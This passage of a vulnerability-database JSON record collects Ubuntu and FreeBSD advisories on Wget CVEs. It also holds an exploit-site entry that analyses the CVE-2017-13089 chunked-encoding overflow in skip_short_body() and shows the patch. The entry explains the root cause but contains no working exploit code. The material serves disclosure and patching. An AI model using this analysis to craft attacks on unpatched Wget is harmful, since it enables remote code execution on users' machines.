ESM.\n\nOriginal advisory details:\n\nAntti Levom\u00c3\u00a4ki, Christian Jalio, and Joonas Pihlaja discovered that Wget incorrectly handled certain HTTP responses. A remote attacker could use this issue to cause Wget to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nDawid Golunski discovered that Wget incorrectly handled recursive or mirroring mode. A remote attacker could possibly use this issue to bypass intended access list restrictions. (CVE-2016-7098)\n\nOrange Tsai discovered that Wget incorrectly handled CRLF sequences in HTTP headers. A remote attacker could possibly use this issue to inject arbitrary HTTP headers. (CVE-2017-6508)", "edition": 3, "reporter": "Ubuntu", "published": "2017-10-30T00:00:00", "title": "Wget vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-6508", "CVE-2017-13089", "CVE-2017-13090", "CVE-2016-7098"], "modified": "2017-10-30T00:00:00", "id": "USN-3464-2", "href": "https://usn.ubuntu.com/3464-2/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:13:49", "references": ["http://git.savannah.gnu.org/cgit/wget.git/commit/?id=d892291fb8ace4c3b734ea5125770989c215df3f"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.19.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget", "operator": "lt"}], "description": "\nAntti Levom\u00c3\u00a4ki, Christian Jalio, Joonas Pihlaja:\n\nWget contains two vulnerabilities, a stack overflow and a heap\n\t overflow, in the handling of HTTP chunked encoding. By convincing\n\t a user to download a specific link over HTTP, an attacker may be\n\t able to execute arbitrary code with the privileges of the user.\n\t \n\n", "edition": 4, "reporter": "FreeBSD", "published": "2017-10-20T00:00:00", "title": "wget -- Stack overflow in HTTP protocol handling", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089"], "modified": "2017-10-20T00:00:00", "id": "09849E71-BB12-11E7-8357-3065EC6F3643", "href": "https://vuxml.freebsd.org/freebsd/09849e71-bb12-11e7-8357-3065ec6f3643.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:13:49", "references": ["http://git.savannah.gnu.org/cgit/wget.git/commit/?id=ba6b44f6745b14dce414761a8e4b35d31b176bba"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.19.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget", "operator": "lt"}], "description": "\nAntti Levom\u00c3\u00a4ki, Christian Jalio, Joonas Pihlaja:\n\nWget contains two vulnerabilities, a stack overflow and a heap\n\t overflow, in the handling of HTTP chunked encoding. By convincing\n\t a user to download a specific link over HTTP, an attacker may be\n\t able to execute arbitrary code with the privileges of the user.\n\t \n\n", "edition": 4, "reporter": "FreeBSD", "published": "2017-10-20T00:00:00", "title": "wget -- Heap overflow in HTTP protocol handling", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13090"], "modified": "2017-10-20T00:00:00", "id": "D77CEB8C-BB13-11E7-8357-3065EC6F3643", "href": "https://vuxml.freebsd.org/freebsd/d77ceb8c-bb13-11e7-8357-3065ec6f3643.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-17T21:27:51", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "Antti Levom\u00e4ki", "published": "2017-11-27T00:00:00", "title": "Wget HTTP integer overflow Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13089"], "modified": "2017-11-27T00:00:00", "href": "https://0day.today/exploit/description/29067", "id": "1337DAY-ID-29067", "sourceData": "wget HTTP integer overflow Exploit\r\n\r\nhttps://xorl.wordpress.com/2017/11/11/cve-2017-13089-wget-http-integer-overflow/\r\n\r\nThat\u2019s an interesting vulnerability in GNU wget. According to the wget project, this was reported by Antti Levom\u00e4ki, Christian Jalio, Joonas Pihlaja of Forcepoint as well as Juhani Eronen of the Finnish National Cyber Security Centre. The vulnerability is in src/http.c source code file and more precisely in skip_short_body() function.\r\n\r\n/* Read the body of the request, but don't store it anywhere and don't\r\n display a progress gauge. This is useful for reading the bodies of\r\n administrative responses to which we will soon issue another\r\n request. The response is not useful to the user, but reading it\r\n allows us to continue using the same connection to the server.\r\n\r\n If reading fails, false is returned, true otherwise. In debug\r\n mode, the body is displayed for debugging purposes. */\r\n\r\nstatic bool\r\nskip_short_body (int fd, wgint contlen, bool chunked)\r\n{\r\n enum {\r\n SKIP_SIZE = 512, /* size of the download buffer */\r\n SKIP_THRESHOLD = 4096 /* the largest size we read */\r\n };\r\n wgint remaining_chunk_size = 0;\r\n ...\r\n return true;\r\n}\r\n\r\nThe description in the comment is pretty clear but what we care about here is the \u201cremaining_chunk_size\u201d variable which has data type of \u201cwgint\u201d. This is a data type defined in src/wget.h header file based on the architecture and operating system.\r\n\r\n/* Pick an integer type large enough for file sizes, content lengths,\r\n and such. Because today's files can be very large, it should be a\r\n signed integer at least 64 bits wide. This can't be typedeffed to\r\n off_t because: a) off_t is always 32-bit on Windows, and b) we\r\n don't necessarily want to tie having a 64-bit type for internal\r\n calculations to having LFS support. */\r\n\r\n#ifdef WINDOWS\r\n /* nothing to do, see mswindows.h */\r\n#elif SIZEOF_LONG >= 8\r\n /* long is large enough, so use it. */\r\n typedef long wgint;\r\n# define SIZEOF_WGINT SIZEOF_LONG\r\n#elif SIZEOF_LONG_LONG >= 8\r\n /* long long is large enough and available, use that */\r\n typedef long long wgint;\r\n# define SIZEOF_WGINT SIZEOF_LONG_LONG\r\n#elif HAVE_INT64_T\r\n typedef int64_t wgint;\r\n# define SIZEOF_WGINT 8\r\n#elif SIZEOF_OFF_T >= 8\r\n /* In case off_t is typedeffed to a large non-standard type that our\r\n tests don't find. */\r\n typedef off_t wgint;\r\n# define SIZEOF_WGINT SIZEOF_OFF_T\r\n#else\r\n /* Fall back to using long, which is always available and in most\r\n cases large enough. */\r\n typedef long wgint;\r\n# define SIZEOF_WGINT SIZEOF_LONG\r\n#endif\r\n\r\nWhat is worth noting is all of the type definitions are using signed data types. This means that \u201cwgint\u201d variables can get both positive and negative values. Now that this is clear, let\u2019s move back to http.c and skip_short_body() function.\r\n\r\nstatic bool\r\nskip_short_body (int fd, wgint contlen, bool chunked)\r\n{\r\n ...\r\n SKIP_SIZE = 512, /* size of the download buffer */\r\n ...\r\n wgint remaining_chunk_size = 0;\r\n char dlbuf[SKIP_SIZE + 1];\r\n ...\r\n while (contlen > 0 || chunked)\r\n {\r\n int ret;\r\n if (chunked)\r\n {\r\n if (remaining_chunk_size == 0)\r\n {\r\n char *line = fd_read_line (fd);\r\n char *endl;\r\n if (line == NULL)\r\n break;\r\n\r\n remaining_chunk_size = strtol (line, &endl, 16);\r\n xfree (line);\r\n ...\r\n contlen = MIN (remaining_chunk_size, SKIP_SIZE);\r\n ...\r\n ret = fd_read (fd, dlbuf, MIN (contlen, SKIP_SIZE), -1);\r\n ...\r\n}\r\n\r\nSo, when wget processes chunked responses it will enter this \u201cwhile\u201d loop (content length greater than zero or the response is chunked). When the chunk size gets to 0, it will read the next line using fd_read_line() and then attempt to retrieve the remaining chunk size using strtol() in hexadecimal. This value is 100% controlled by the response header and it could be anything, including so large that it will wrap around this signed integer into a negative value. Then MIN() macro will be used to compare that value with SKIP_SIZE (which is 512) and use this to initialize \u201ccontlen\u201d signed integer. If \u201cremaining_chunk_size\u201d had a negative value it means that this will now be stored in \u201ccontlen\u201d which is then used in fd_read() leading to a stack based buffer overflow as the attacker completely controls the size argument that is used to copy data from \u201cfd\u201d (the HTTP page) to \u201cdlbuf\u201d (stack based buffer with size of 513 bytes). The fix was relatively simple as you can see below.\r\n\r\n remaining_chunk_size = strtol (line, &endl, 16);\r\n xfree (line);\r\n\r\n+ if (remaining_chunk_size < 0)\r\n+ return false;\r\n+\r\n if (remaining_chunk_size == 0)\r\n\r\nThe fix was a simple bound check after the strtol() call to ensure that the value of \u201cremaining_chunk_size\u201d was not set to a negative value before continuing with the processing.\r\n\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29067"}]}